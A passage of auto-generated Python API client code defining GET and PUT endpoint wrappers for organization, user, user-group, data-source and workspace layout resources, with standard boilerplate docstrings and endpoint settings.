>>> thread = api.get_organization_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeOrganization
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_organization_layout = _Endpoint(
settings={
'response_type': (DeclarativeOrganization,),
'auth': [],
'endpoint_path': '/api/layout/organization',
'operation_id': 'get_organization_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_organization_layout
)
def __get_user_groups_layout(
self,
**kwargs
):
"""Get all users # noqa: E501
Retrieve all user-groups eventually with parent group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_groups_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeUserGroups
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_user_groups_layout = _Endpoint(
settings={
'response_type': (DeclarativeUserGroups,),
'auth': [],
'endpoint_path': '/api/layout/userGroups',
'operation_id': 'get_user_groups_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_user_groups_layout
)
def __get_users_layout(
self,
**kwargs
):
"""Get all users # noqa: E501
Retrieve all users including authentication properties. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_users_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeUsers
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_users_layout = _Endpoint(
settings={
'response_type': (DeclarativeUsers,),
'auth': [],
'endpoint_path': '/api/layout/users',
'operation_id': 'get_users_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_users_layout
)
def __get_users_user_groups_layout(
self,
**kwargs
):
"""Get all users and user groups # noqa: E501
Retrieve all users and user groups with theirs properties. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_users_user_groups_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeUsersUserGroups
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_users_user_groups_layout = _Endpoint(
settings={
'response_type': (DeclarativeUsersUserGroups,),
'auth': [],
'endpoint_path': '/api/layout/usersAndUserGroups',
'operation_id': 'get_users_user_groups_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_users_user_groups_layout
)
def __get_workspace_data_filters_layout(
self,
**kwargs
):
"""Get workspace data filters for all workspaces # noqa: E501
Retrieve all workspaces and related workspace data filters (and their settings / values). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workspace_data_filters_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeWorkspaceDataFilters
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_workspace_data_filters_layout = _Endpoint(
settings={
'response_type': (DeclarativeWorkspaceDataFilters,),
'auth': [],
'endpoint_path': '/api/layout/workspaceDataFilters',
'operation_id': 'get_workspace_data_filters_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_workspace_data_filters_layout
)
def __get_workspace_layout(
self,
workspace_id,
**kwargs
):
"""Get workspace layout # noqa: E501
Retrieve current model of the workspace in declarative form. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workspace_layout(workspace_id, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeWorkspaceModel
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
return self.call_with_http_info(**kwargs)
self.get_workspace_layout = _Endpoint(
settings={
'response_type': (DeclarativeWorkspaceModel,),
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}',
'operation_id': 'get_workspace_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'workspace_id',
],
'required': [
'workspace_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_workspace_layout
)
def __get_workspaces_layout(
self,
**kwargs
):
"""Get all workspaces layout # noqa: E501
Gets complete layout of workspaces, their hierarchy, models. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workspaces_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeWorkspaces
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_workspaces_layout = _Endpoint(
settings={
'response_type': (DeclarativeWorkspaces,),
'auth': [],
'endpoint_path': '/api/layout/workspaces',
'operation_id': 'get_workspaces_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_workspaces_layout
)
def __put_data_sources_layout(
self,
declarative_users_user_groups,
**kwargs
):
"""Put all data sources # noqa: E501
Set all data sources including related physical model. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_data_sources_layout(declarative_users_user_groups, async_req=True)
>>> result = thread.get()
Args:
declarative_users_user_groups (DeclarativeUsersUserGroups):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_users_user_groups'] = \
declarative_users_user_groups
return self.call_with_http_info(**kwargs)
self.put_data_sources_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/usersAndUserGroups',
'operation_id': 'put_data_sources_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_users_user_groups',
],
'required': [
'declarative_users_user_groups',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_users_user_groups':
(DeclarativeUsersUserGroups,),
},
'attribute_map': {
},
'location_map': {
'declarative_users_user_groups': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__put_data_sources_layout
)
def __put_data_sources_layout1(
self,
declarative_data_sources,
**kwargs
):
"""Put all data sources # noqa: E501
Set all data sources including related physical model. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_data_sources_layout1(declarative_data_sources, async_req=True)
>>> result = thread.get()
Args:
declarative_data_sources (DeclarativeDataSources):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_data_sources'] = \
declarative_data_sources
return self.call_with_http_info(**kwargs)
self.put_data_sources_layout1 = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/dataSources',
'operation_id': 'put_data_sources_layout1',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_data_sources',
],
'required': [
'declarative_data_sources',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_data_sources':
(DeclarativeDataSources,),
},
'attribute_map': {
},
'location_map': {
'declarative_data_sources': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__put_data_sources_layout1
)
def __put_user_groups_layout(
self,
declarative_user_groups,
**kwargs
):
"""Put all user groups # noqa: E501
Define all user groups with their parents eventually. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_user_groups_layout(declarative_user_groups, async_req=True)
>>> result = thread.get()
Args:
declarative_user_groups (DeclarativeUserGroups):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_user_groups'] = \
declarative_user_groups
return self.call_with_http_info(**kwargs)
self.put_user_groups_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/userGroups',
'operation_id': 'put_user_groups_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_user_groups',
],
'required': [
'declarative_user_groups',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_user_groups':
(DeclarativeUserGroups,),
},
'attribute_map': {
},
'location_map': {
'declarative_user_groups': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__put_user_groups_layout
)
def __put_users_layout(
self,
declarative_users,
**kwargs
):
"""Put all users # noqa: E501
Set all users and their authentication properties. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_users_layout(declarative_users, async_req=True)
>>> result = thread.get()
Args:
declarative_users (DeclarativeUsers):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_users'] = \
declarative_users
return self.call_with_http_info(**kwargs)
self.put_users_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/users',
'operation_id': 'put_users_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_users',
],
'required': [
'declarative_users',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_users':
(DeclarativeUsers,),
},
'attribute_map': {
},
'location_map': {
'declarative_users': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__put_users_layout
)
def __put_workspace_layout(
self,
workspace_id,
declarative_workspace_model,
**kwargs
):
"""Set workspace layout # noqa: E501
Set complete layout of workspace, like model, ACLs, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_workspace_layout(workspace_id, declarative_workspace_model, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
declarative_workspace_model (DeclarativeWorkspaceModel):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
kwargs['declarative_workspace_model'] = \
declarative_workspace_model
return self.call_with_http_info(**kwargs)
self.put_workspace_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}',
'operation_id': 'put_workspace_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'workspace_id',
'declarative_workspace_model',
],
'required': [
'workspace_id',
'declarative_workspace_model',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
'declarative_workspace_model':
(DeclarativeWorkspaceModel,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
'declarative_workspace_model': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__put_workspace_layout
)
def __set_analytics_model(
self,
workspace_id,
declarative_analytics,
**kwargs
):
"""Set analytics model # noqa: E501
Set effective analytics model of the workspace. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_analytics_model(workspace_id, declarative_analytics, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
declarative_analytics (DeclarativeAnalytics):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
kwargs['declarative_analytics'] = \
declarative_analytics
return self.call_with_http_info(**kwargs)
self.set_analytics_model = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}/analyticsModel',
'operation_id': 'set_analytics_model',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'workspace_id',
'declarative_analytics',
],
'required': [
'workspace_id',
'declarative_analytics',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
'declarative_analytics':
(DeclarativeAnalytics,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
'declarative_analytics': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_analytics_model
)
def __set_logical_model(
self,
workspace_id,
declarative_model,
**kwargs
):
"""Set logical model # noqa: E501
Set effective logical model of the workspace. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_logical_model(workspace_id, declarative_model, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
declarative_model (DeclarativeModel):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
kwargs['declarative_model'] = \
declarative_model
return self.call_with_http_info(**kwargs)
self.set_logical_model = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}/logicalModel',
'operation_id': 'set_logical_model',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'workspace_id',
'declarative_model',
],
'required': [
'workspace_id',
'declarative_model',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
'declarative_model':
(DeclarativeModel,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
'declarative_model': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_logical_model
)
def __set_organization_layout(
self,
declarative_organization,
**kwargs
):
"""Set organization layout # noqa: E501
